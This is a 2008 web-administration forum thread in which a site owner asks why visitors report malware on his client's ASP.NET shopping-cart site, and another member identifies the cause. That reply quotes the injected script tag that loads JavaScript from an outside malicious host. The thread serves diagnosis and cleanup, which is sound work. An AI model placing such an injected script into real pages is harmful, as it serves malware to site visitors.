Tycoon Talk
Become a Big fish!
The number 1 forum for online business!
Post topics, ask questions, share your knowledge.
Tycoon Talk is part of Freelancer.com - find skilled workers online at a fraction of the cost.

Website and Server Administration Forum


You are currently viewing our Website and Server Administration Forum as a guest. Please register to participate.
Login



Reply
reported malware infection on a website
Old 03-10-2008, 02:15 AM reported malware infection on a website
ddvvns's Avatar
Experienced Talker

Posts: 35
Name: Val Saidor
Trades: 0
Hi all,

I have a client www.onlinekitchen.com.au who is getting heaps of clients reporting that the website is infected with malware and is trying to install it on the visitors sites.

the website is a asp.net commercial content management system with VPASP shopping cart. I have 2 different antivirus software packages on my systems (norton and trend micro) and I do not get any warnings while browsing the site.

I have asked the hosting company to run antivirus on the web folders and used:
http://www.siteadvisor.com/sites/onlinekitchen.com.au

http://linkscanner.explabs.com/linkscanner/checksite.asp?NS=ChkOnly&SRC=apps.ExpLabs.com&CS=h ttp://www.onlinekitchen.com.auand found no errors or warnings...

At the same time I have Acunetix web volnurability scanner running in extensive mode with no warnings!!!
Every day there are new messages from visitors in this regards one of which has stated that the virus is JS.Psyme.

It looks like I am out of options in looking for a solution - please help!
All advice and suggestions are welcome.

Thank you,
Val Saidor

< link drop removed >

Last edited by chrishirst; 03-10-2008 at 03:44 PM..
ddvvns is offline
Reply With Quote
View Public Profile Visit ddvvns's homepage!
 
 
Register now for full access!
Old 03-10-2008, 02:26 AM Re: reported malware infection on a website
ADAM Web Design's Avatar
Canadastaninianite

Posts: 5,938
Name: Adam for web page design, not program
Location: Toronto, Ontario, Canada
Trades: 0
Is that actually your signature? It doesn't look like it's below the signature line.

They're telling you the truth. On this page, I got a virus alert. DO NOT CLICK THE LINK BELOW UNLESS YOU'RE PREPARED TO DEAL WITH THIS VIRUS AND ITS CONSEQUENCES:

http://www.onlinekitchen.com.au/vsho...=145&cat=Bamix

Code:
<SCRIPT src="http://b.njnk.net/E/J.JS"></SCRIPT>
You need to find that line of code, remove it, and then either find a better shopping cart system or build your own (likely the latter, since most if not all shopping cart systems tend to be exploited more rapidly).

The other thing you'll want to do is clean up a lot of the code that the CMS is generating (a lot of MS-proprietary HTML code is kicking around on your home page, among other places.)

You've got some work ahead of you, dude. Pack a lunchbox.
__________________

Please login or register to view this content. Registration is FREE
|
Please login or register to view this content. Registration is FREE
(my blog)


Please login or register to view this content. Registration is FREE
(with proof)

Last edited by ADAM Web Design; 03-10-2008 at 02:28 AM..
ADAM Web Design is offline
Reply With Quote
View Public Profile Visit ADAM Web Design's homepage!
 
Old 03-10-2008, 02:37 AM Re: reported malware infection on a website
ddvvns's Avatar
Experienced Talker

Posts: 35
Name: Val Saidor
Trades: 0
Great advice - thank you.
I have clicked on hunreds of pages from then website and found no issues and now I know where the @#$%@# is!!!

Once again thank you.
ddvvns is offline
Reply With Quote
View Public Profile Visit ddvvns's homepage!
 
Old 03-10-2008, 02:47 AM Re: reported malware infection on a website
ADAM Web Design's Avatar
Canadastaninianite

Posts: 5,938
Name: Adam for web page design, not program
Location: Toronto, Ontario, Canada
Trades: 0
Don't thank me. Thank Avast (one of the two top AV scanners available, and it's legit free).
__________________

Please login or register to view this content. Registration is FREE
|
Please login or register to view this content. Registration is FREE
(my blog)


Please login or register to view this content. Registration is FREE
(with proof)
ADAM Web Design is offline
Reply With Quote
View Public Profile Visit ADAM Web Design's homepage!
 
Old 03-10-2008, 06:04 AM Re: reported malware infection on a website
ddvvns's Avatar
Experienced Talker

Posts: 35
Name: Val Saidor
Trades: 0
It must be embarrasing for a $39.00 software to do better then $5,500
ddvvns is offline
Reply With Quote
View Public Profile Visit ddvvns's homepage!
 
Old 03-10-2008, 03:46 PM Re: reported malware infection on a website
chrishirst's Avatar
Missing! presumed drunk.

Posts: 41,528
Name: Chris Hirst
Location: Blackpool. UK
Trades: 0
Norton don't seem to think so, otherwise they would improve their software quite a lot.
__________________
Chris. ->> Links are advertising NOT optimising!! <<-
A foolish consistency is the hobgoblin of little minds
Thought for today:- I SEO the only industry where all the cowboys are Indians?
chrishirst is offline
Reply With Quote
View Public Profile Visit chrishirst's homepage!
 
Reply     « Reply to reported malware infection on a website
 

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off





   
RSS Feed  Feeds: RSS   JS   XML
RSS Feed  Feeds for this forum: RSS   JS   XML



Page generated in 0.17319 seconds with 12 queries